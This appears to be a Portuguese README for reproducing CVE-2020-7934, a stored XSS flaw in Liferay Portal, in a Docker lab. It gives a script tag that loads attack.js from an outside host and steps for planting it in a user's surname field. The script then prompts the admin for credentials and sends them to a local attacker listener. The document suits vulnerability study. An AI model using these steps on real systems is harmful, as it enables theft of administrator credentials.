CVE 2020-7934
Como executar o CVE
Requisitos
- docker
Observações
é possível colocar o script de ataque online (dado o código js) http://yourjavascript.com/
Nosso script Js online para o ataque
html <script src="http://yourjavascript.com/920172199111/attack.js"></script>
Comandos para configuração
- vá para a pasta raiz deste projeto
- execute "sudo docker-compose up --build"
- novo terminal: execute "docker inspect liferay" ==> e copie o valor do IPAddress
- novo terminal: execute "python api_attacker.py"
- abra um navegador e vá para "http://IPAddress:8080" ==> você deve obter o portal liferay como resposta
- para parar e deletar containers use "sudo docker-compose rm"
Instruções para o ataque
- Registre-se no liferay como um usuário, faça login e, na seção "sites disponíveis", junte-se ao site "liferay".
- Altere o "sobrenome" em um script JS (diretamente () ou através de um "src =" http ... "")
- Faça login como administrador liferay (username: [email protected], password: test)
- Vá para sites disponíveis e clique em "liferay", a página pública deste site será aberta.
- Vá para a nova página, um menu será aberto à direita, clique em membership.
- Selecione o usuário registrado no passo 1. Nesse momento, o script será executado.
5.1) No script attack.js, a página solicitará as credenciais.
- No terminal do passo 5 (dos Comandos para configuração) será impresso o username/password inserido em 5.1 (pelo admin) )